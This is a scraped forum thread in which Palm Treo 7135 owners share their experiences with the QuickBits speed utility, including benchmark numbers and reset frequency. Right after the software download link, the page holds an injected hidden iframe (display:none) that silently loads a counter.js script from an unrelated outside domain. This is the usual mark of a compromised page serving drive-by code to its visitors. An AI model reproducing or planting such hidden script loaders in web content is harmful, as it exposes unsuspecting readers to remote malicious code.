+ Reply to Thread

QuickBits enhancement for 7135

I just loaded Quickbits and in the past with the other OVERCLOCKING apps my phone side would not function properly. But I have Quickbits running and the phone is taking calls, switching between palm and phone w/ no issues and matter of fact I can now dial the keypad QUICKLY without the palm falling behind!

if anyone else is interested lets get this program loaded into our 7135's and see how it performs on different configurations and lets keep each other posted on what we find and maybe this will be the program we can use to ENHANCE some of the capabilities of the 7135! Good luck and I will keep you guys posted with anything I find.

http://palmgear.com/software/showsof...fm?prodID=9556<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

I just loaded it and everything seems to be running well, but I'm not sure I see a noticeable difference in app speed. I'll play with it for a few days and see what happens.

A 7135 and D7A-G in a Civic Hybrid! KB2PMD's Avatar
    I've been using it ever since I migrated from my m515, and love it! Never had a single problem with it.
    If you haven't already, please vote on a bluetooth voice AND data adapter for the 7135 (that plugs into the serial port, leaving your expansion card slot free!)

Just loaded QuickBits also. PDA side is working fine. Haven't tried the phone side except to check e-mail via SnapperMail---worked fine. I think I can see an improvement in speed esp when using scroll arrows. VERY FAST!!!

Checked it with Speedy v2.5. As I posted yesterday: 28MHZ 142 %. With QuickBits: 33MHZ 165%

My 7135 is an original ALLTEL on ALLTEL. I have only had 1 hard reset when I took the phone out of the sync cradle too soon. 2-3 soft resets per week on average. If I start having problems, I will know to blame QuickBits.
    Krazman - "IT MAY BE THAT YOUR PURPOSE IN LIFE IS TO SERVE AS A WARNING TO OTHERS"

Originally posted by Krazman
    Just loaded QuickBits also. PDA side is working fine. Haven't tried the phone side except to check e-mail via SnapperMail---worked fine. I think I can see an improvement in speed esp when using scroll arrows. VERY FAST!!!

Checked it with Speedy v2.5. As I posted yesterday: 28MHZ 142 %. With QuickBits: 33MHZ 165%

My 7135 is an original ALLTEL on ALLTEL. I have only had 1 hard reset when I took the phone out of the sync cradle too soon. 2-3 soft resets per week on average. If I start having problems, I will know to blame QuickBits.
    I have not used QuickBits on my phone yet, and I have almost exactly same hard/soft reset frequency as you. I bought the unactivated phone from Get Connected around Christmas time. I am not familiar with Quickbits, maybe I will look into it, especially if you folks think it removes that slight delay on keypad entry, etc. Maybe it will help on mp3's and kinoma videos?

I have QuickBits loaded on my 7135, and have no problems with either the Palm side or the Phone side. It definitely makes a difference in the speed of displaying things, with the exception of typing in phone numbers on the keypad. That is still slow. Overall, I think it's a great little utility!
    Michael